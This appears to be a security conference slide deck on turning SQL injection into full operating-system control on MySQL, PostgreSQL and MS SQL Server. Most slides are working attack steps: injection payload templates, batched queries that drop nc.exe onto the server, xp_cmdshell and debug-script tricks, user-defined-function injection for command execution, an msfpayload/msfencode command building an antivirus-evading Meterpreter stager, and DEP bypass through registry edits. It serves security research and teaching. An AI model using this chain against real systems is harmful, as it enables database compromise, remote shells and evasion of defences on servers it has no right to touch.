



# Advanced SQL injection to operating system full control

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# SQL injection definition

- SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements
- It is a common threat in web applications that lack of proper sanitization on user-supplied input used in SQL queries
- It does not affect only web applications!



# SQL injection techniques

## ■ Boolean based blind SQL injection:

`par=1 AND ORD(MID((SQL query),  
Nth char, 1)) > Bisection num--`

## ■ UNION query (inband) SQL injection:

`par=1 UNION ALL SELECT query--`

## ■ Batched queries SQL injection:

`par=1; SQL query;--`



# **How far can an attacker go by exploiting a SQL injection?**



# Scope of the analysis

- Three database software:
  - ▶ **MySQL** on Windows
  - ▶ **PostgreSQL** on Windows and Linux
  - ▶ **Microsoft SQL Server** on Windows
  
- Three web application languages:
  - ▶ **ASP** on Microsoft IIS, Windows
  - ▶ **ASP.NET** on Microsoft IIS, Windows
  - ▶ **PHP** on Apache and Microsoft IIS



# Batched queries

- In SQL, **batched queries** are multiple SQL statements, separated by a semicolon, and passed to the database
- Example:

```
SELECT col FROM table1 WHERE  
id=1; DROP table2;
```



# Batched queries support

	ASP	ASP.NET	PHP
MySQL	No	Yes	No
PostgreSQL	Yes	Yes	Yes
Microsoft SQL Server	Yes	Yes	Yes

Programming languages and their DBMS connectors default support for batched queries



# **File system write access**



# File write access on MySQL

On the attacker box:

- Encode the local file content to its corresponding **hexadecimal string**
- Split the hexadecimal encoded string into chunks long 1024 characters each



# File write access on MySQL

Via batched queries SQL injection technique:

```
CREATE TABLE footable(data longblob);

INSERT INTO footable(data) VALUES
(0x4d5a90...610000);

UPDATE footable SET
data=CONCAT(data, 0xaa270000...000000);
[...];

SELECT data FROM footable INTO DUMPFILE
'C:/WINDOWS/Temp/nc.exe';
```



# File write access on PostgreSQL

On the attacker box:

- Encode the local file content to its corresponding **base64** string
- Split the base64 encoded string into chunks long 1024 characters each



# File write access on PostgreSQL

Via batched queries SQL injection technique:

```
CREATE TABLE footable(data text);
INSERT INTO footable(data) VALUES ('TVqqQ...');
UPDATE footable SET data=data||'U8pp...vgDw';
[...]

SELECT lo_create(47);
UPDATE pg_largeobject SET data=(DECODE((SELECT
data FROM footable), 'base64')) WHERE loid=47;

SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe');
```



# File write access on MS SQL Server

- Microsoft SQL Server can execute commands: `xp_cmdshell ()`

```
EXEC xp_cmdshell('echo ... >> filepath')
```

- Session user must have **CONTROL SERVER** privilege
- On the attacker box:
  - ▶ Split the file in chunks of **64Kb**
  - ▶ Convert each chunk to its plain text **debug script** format



# File write access on MS SQL Server

Example of nc.exe:

```
00000000  4D 5A 90 00  03 00 00 00  
00000008  04 00 00 00  FF FF 00 00  
[...]
```

As a plain text debug script:

```
n qq1bc          // Create a temporary file  
rcx              // Write the file size in  
f000             // the CX registry  
f 0100 f000 00  // Fill the segment with 0x00  
e 100 4d 5a 90 00 03 [...] // Write in memory all values  
e 114 00 00 00 00 40 [...]  
[...]  
w                // Write the file to disk  
q                // Quit debug.exe
```



# File write access on MS SQL Server

Via batched queries SQL injection technique:

- For each debug script:

```
EXEC master..xp_cmdshell '  
echo n qq1bc >> C:\WINDOWS\Temp\zdfiq.scr &  
echo rcx >> C:\WINDOWS\Temp\zdfiq.scr &  
echo f000 >> C:\WINDOWS\Temp\zdfiq.scr &  
echo f 0100 f000 00 >>  
C:\WINDOWS\Temp\zdfiq.scr &  
[...] '
```



# File write access on MS SQL Server

```
EXEC master..xp_cmdshell '  
cd C:\WINDOWS\Temp &  
debug < C:\WINDOWS\Temp\zdfiq.scr &  
del /F C:\WINDOWS\Temp\zdfiq.scr &  
copy /B /Y netcat+qqlbc netcat'
```

```
EXEC master..xp_cmdshell '  
cd C:\WINDOWS\Temp &  
move /Y netcat C:/WINDOWS/Temp/nc.exe'
```



# **Operating system access**



# User-Defined Function

- In SQL, a **user-defined function** is a custom function that can be evaluated in SQL statements
- UDF can be created from **shared libraries** that are compiled binary files
  - ▶ **Dynamic-link library** on Windows
  - ▶ **Shared object** on Linux



# UDF injection

On the attacker box:

- Compile a shared library defining two UDF:
  - ▶ `sys_eval(cmd)` : executes `cmd`, returns stdout
  - ▶ `sys_exec(cmd)` : executes `cmd`, returns status
- The shared library can also be packed to speed up the upload via SQL injection:
  - ▶ Windows: **UPX** for the dynamic-link library
  - ▶ Linux: **strip** for the shared object



# UDF injection

Via batched queries SQL injection technique:

- Upload the shared library to the DBMS file system
- Create the two UDF from the shared library
- Call either of the UDF to execute commands



# UDF injection on MySQL

## UDF Repository for MySQL

- **lib\_mysqludf\_sys** shared library:

- ▶ Approximately **6Kb** packed
- ▶ Added **sys\_eval()** to return command **standard output**
- ▶ Compliant with MySQL **5.0+**
- ▶ Works on **all** versions of MySQL from **4.1.0**
- ▶ Compatible with both **Windows** or **Linux**



# UDF injection on MySQL

Via batched queries SQL injection technique:

- Fingerprint MySQL version
- Upload the shared library to a file system path where the MySQL looks for them

```
CREATE FUNCTION sys_exec RETURNS int  
SONAME 'libudffmwgj.dll';
```

```
CREATE FUNCTION sys_eval RETURNS string  
SONAME 'libudffmwgj.dll';
```



# UDF injection on PostgreSQL

Ported MySQL shared library to PostgreSQL

■ `lib_postgresqludf_sys` shared library:

- ▶ Approximately **6Kb** packed
- ▶ C-Language Functions: `sys_eval()` and `sys_exec()`
- ▶ Compliant with PostgreSQL **8.2+** *magic block*
- ▶ Works on **all** versions of PostgreSQL from **8.0**
- ▶ Compatible with both **Windows** or **Linux**



# UDF injection on PostgreSQL

Via batched queries SQL injection technique:

- Fingerprint PostgreSQL version
- Upload the shared library to any file system path where PostgreSQL has **rw** access

```
CREATE OR REPLACE FUNCTION sys_exec(text)
RETURNS int4 AS 'libudflenpx.dll',
'sys_exec' LANGUAGE C [...];
```

```
CREATE OR REPLACE FUNCTION sys_eval(text)
RETURNS text AS 'libudflenpx.dll',
'sys_eval' LANGUAGE C [...];
```



# Command execution on MS SQL Server

## `xp_cmdshell ()` stored procedure:

- Session user must have `sysadmin` role or be specified as a *proxy account*
- Enabled by default on MS SQL Server **2000** or re-enabled via `sp_addextendedproc`



# Command execution on MS SQL Server

- Disabled by default on MS SQL Server **2005** and **2008**, it can be:
  - ▶ Re-enabled via `sp_configure`
  - ▶ Created from scratch using **shell object**



# **Out-of-band connection**



# OOB connection definition

Contrary to in-band connections (HTTP), it uses an alternative channel to return data

This concept can be extended to establish a **full-duplex connection between the attacker host and the database server**

- Over this channel the attacker can have a command prompt or a graphical access (VNC) to the DBMS server



# A good friend: Metasploit

- **Metasploit** is a powerful open source exploitation framework
  - ▶ **Post-exploitation** in a SQL injection scenario
- SQL injection as a stepping stone for OOB channel using Metasploit **can** be achieved
  - ▶ Requires **file system** write access and **command execution** via in-band connection – already achieved



# OOB via payload stager

On the attacker box:

- Forge a stand-alone payload stager with `msfpayload`
- Encode it with `msfencode` to bypass AV
- Pack it with **UPX** to speed up the upload via SQL injection if the target OS is Windows



# OOB via payload stager

Example of payload stager creation and encode:

```
$ msfpayload windows/meterpreter/bind_tcp  
EXITFUNC=process LPORT=31486 R | msfencode -e  
x86/shikata_ga_nai -t exe -o stagerbvdcp.exe
```

Payload stager compression:

```
$ upx -9 -qq stagerbvdcp.exe
```

The payload stager size is **9728** bytes, as a compressed executable its size is **2560** bytes



# OOB via payload stager

- On the attacker box:

- ▶ Run `msfcli` with `multi/handler` exploit

- Via batched queries SQL injection technique:

- ▶ Upload the stand-alone payload stager to the file system temporary folder of the DBMS
  - ▶ Execute it via `sys_exec()` or `xp_cmdshell()`



# Stored procedure buffer overflow

- Discovered by **Bernhard Mueller** on December 4, 2008
  - ▶ `sp_replwritetovarbin` heap-based buffer overflow on Microsoft SQL Server 2000 SP4 and Microsoft SQL Server 2005 SP2
- Patched by Microsoft on February 10, 2009
  - MS09-004



# Buffer overflow exploit

- Session user needs only **EXECUTE** privilege on the stored procedure – **default**
- **Guido Landi** wrote the first public stand-alone exploit for this vulnerability
  - ▶ I added support for multi-stage payload and integrated it in **sqlmap**



# Data Execution Prevention

- DEP is a security feature that prevents code execution in memory pages not marked as **executable**
- It can be configured to allow exceptions
- Default settings allow exceptions:
  - ▶ Windows 2003 SP1+: OptOut
  - ▶ Windows 2008 SP0+: OptOut



# Bypass DEP

## ■ When it is set to OptOut:

- ▶ Exception for **sqlservr.exe** in the registry
  - Via **bat** file by calling **reg**
  - Via **reg** file by passing it to **regedit**
  - Via **master..xp\_regwrite**
- ▶ Upload and execute a **bat** file which executes **sc** to restart the process



# Credits

- Guido Landi
- Alberto Revelli
- Alessandro Tanasi
- Metasploit development team
- More acknowledgments and references on the white paper, <http://tinyurl.com/sqlmap1>



# Questions?



# Thanks for your attention!

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